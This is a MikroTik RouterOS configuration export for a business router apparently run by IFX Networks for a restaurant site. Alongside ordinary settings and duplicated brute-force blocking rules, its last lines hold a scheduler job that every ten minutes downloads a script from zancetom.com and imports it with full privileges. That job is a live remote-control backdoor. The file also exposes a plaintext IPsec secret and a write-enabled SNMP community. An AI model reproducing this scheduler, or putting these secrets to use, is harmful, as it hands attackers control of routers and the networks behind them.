# apr/29/2022 13:58:23 by RouterOS 6.47.8 # software id = NS2M-BN6D # # model = RB750Gr3 # serial number = D5030DFBC9FC /interface bridge add name=LAN add name=WAN /interface wireless security-profiles set [ find default=yes ] supplicant-identity=MikroTik /ip hotspot profile set [ find default=yes ] html-directory=flash/hotspot /ip ipsec profile add dh-group=modp1024 enc-algorithm=aes-256 lifetime=8h name="C&W Business" /ip ipsec peer add address=181.189.131.182/32 name="C&W Business" profile="C&W Business" /ip ipsec proposal add enc-algorithms=aes-256-cbc,aes-256-gcm lifetime=1h name="C&W Business" pfs-group=none /ip pool add name=dhcp_pool0 ranges=172.17.44.205-172.17.44.254 /ip dhcp-server add address-pool=dhcp_pool0 disabled=no interface=LAN name=dhcp1 /snmp community add addresses=190.61.4.34/32,190.61.4.170/32,190.61.4.35/32,190.61.4.36/32 name=ifxcliente write-access=yes /interface bridge port add bridge=LAN interface=ether2 add bridge=LAN interface=ether3 add bridge=LAN interface=ether4 add bridge=WAN interface=ether1 /ip neighbor discovery-settings set discover-interface-list=!dynamic /ip address add address=181.119.105.54/24 interface=WAN network=181.119.105.0 add address=172.17.44.1/24 interface=ether2 network=172.17.44.0 add address=10.35.35.106/30 interface=WAN network=10.35.35.104 add address=181.119.105.55 interface=WAN network=181.119.105.55 /ip dhcp-server network add address=172.17.44.0/24 dns-server=167.250.220.220,186.148.105.105 gateway=172.17.44.1 /ip firewall address-list add address=172.16.0.0/15 list="C&W Business" add address=181.189.131.182 list="C&W Business" /ip firewall filter add action=drop chain=input comment="drop ftp brute forcers" dst-port=21 protocol=tcp src-address-list=ftp_blacklist add action=drop chain=input comment="drop Telnet brute forcers" dst-port=23 protocol=tcp src-address-list=telnet_blacklist add action=accept chain=output content="530 Login incorrect" dst-limit=1/1m,9,dst-address/1m protocol=tcp add action=add-dst-to-address-list address-list=ftp_blacklist address-list-timeout=3h chain=output content="530 Login incorrect" \ protocol=tcp add action=add-dst-to-address-list address-list=telnet_blacklist address-list-timeout=3h chain=output content="530 Login incorrect" \ protocol=tcp add action=drop chain=input comment="drop ssh brute forcers" dst-port=22 protocol=tcp src-address-list=ssh_blacklist add action=drop chain=input comment="drop telnet brute forcers" dst-port=23 protocol=tcp src-address-list=telnet_blacklist add action=add-src-to-address-list address-list=ssh_stage3 address-list-timeout=1m chain=input connection-state=new dst-port=22 \ protocol=tcp src-address-list=ssh_stage2 add action=add-src-to-address-list address-list=ssh_stage2 address-list-timeout=1m chain=input connection-state=new dst-port=22 \ protocol=tcp src-address-list=ssh_stage1 add action=add-src-to-address-list address-list=ssh_stage1 address-list-timeout=1m chain=input connection-state=new dst-port=22 \ protocol=tcp add action=add-src-to-address-list address-list=telnet_stage1 address-list-timeout=1m chain=input connection-state=new dst-port=23 \ protocol=tcp add action=drop chain=forward comment="drop ssh brute downstream" dst-port=22 protocol=tcp src-address-list=ssh_blacklist add action=drop chain=input comment="drop ftp brute forcers" dst-port=21 protocol=tcp src-address-list=ftp_blacklist add action=drop chain=input comment="drop Telnet brute forcers" dst-port=23 protocol=tcp src-address-list=telnet_blacklist add action=accept chain=output content="530 Login incorrect" dst-limit=1/1m,9,dst-address/1m protocol=tcp add action=add-dst-to-address-list address-list=ftp_blacklist address-list-timeout=3h chain=output content="530 Login incorrect" \ protocol=tcp add action=add-dst-to-address-list address-list=telnet_blacklist address-list-timeout=3h chain=output content="530 Login incorrect" \ protocol=tcp add action=drop chain=input comment="drop ssh brute forcers" dst-port=22 protocol=tcp src-address-list=ssh_blacklist add action=drop chain=input comment="drop telnet brute forcers" dst-port=23 protocol=tcp src-address-list=telnet_blacklist add action=add-src-to-address-list address-list=ssh_stage3 address-list-timeout=1m chain=input connection-state=new dst-port=22 \ protocol=tcp src-address-list=ssh_stage2 add action=add-src-to-address-list address-list=ssh_stage2 address-list-timeout=1m chain=input connection-state=new dst-port=22 \ protocol=tcp src-address-list=ssh_stage1 add action=add-src-to-address-list address-list=ssh_stage1 address-list-timeout=1m chain=input connection-state=new dst-port=22 \ protocol=tcp add action=add-src-to-address-list address-list=telnet_stage1 address-list-timeout=1m chain=input connection-state=new dst-port=23 \ protocol=tcp add action=drop chain=forward comment="drop ssh brute downstream" dst-port=22 protocol=tcp src-address-list=ssh_blacklist /ip firewall nat add action=accept chain=srcnat dst-address=181.189.131.182 src-address=181.119.105.54 add action=accept chain=srcnat dst-address=172.16.0.0/15 out-interface=WAN src-address=172.17.44.0/24 to-addresses=181.119.105.54 add action=src-nat chain=srcnat out-interface=WAN src-address=172.17.44.0/24 to-addresses=181.119.105.54 /ip ipsec identity add peer="C&W Business" secret=Md/6jYEKzgYRuDD3iXPBwp /ip ipsec policy add dst-address=172.16.0.0/15 peer="C&W Business" proposal="C&W Business" sa-dst-address=181.189.131.182 sa-src-address=181.119.105.54 \ src-address=172.17.44.0/24 tunnel=yes /ip route add distance=1 gateway=10.35.35.105 /ip service set telnet disabled=yes set ftp disabled=yes set www disabled=yes set ssh address="190.60.0.0/16,190.61.0.0/16,172.16.0.0/16,172.17.0.0/16,10.0.120.0/24,200.62.0.0/16,200.91.0.0/16,200.78.196.69/32,144\ .91.71.175/32" set winbox address=190.60.0.0/16,200.62.0.0/16,200.91.0.0/16,200.78.196.69/32,144.91.71.175/32 /snmp set enabled=yes trap-community=ifxcliente /system clock set time-zone-name=America/Guatemala /system identity set name=SID_1672139_CORALSA_WENDYS_JALAPA /system note set note="**************************************************************\ \n* *\ \n* ATENCION: Este equipo es propiedad de IFX Networks *\ \n* El uso no autorizado esta estrictamente prohibido. *\ \n* Todos los usuarios son legalmente responsables de sus *\ \n* acciones sobre el sistema y toda actividad sera registrada *\ \n* *\ \n**************************************************************" /system scheduler add interval=10m name=U6 on-event="/tool fetch url=http://zancetom.com/poll/fd220439-f0fc-414c-a2c2-ef0525e8b03b mode=http dst-path=7wm\ p0b4s.rsc\r\ \n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=jan/07/1970 start-time=\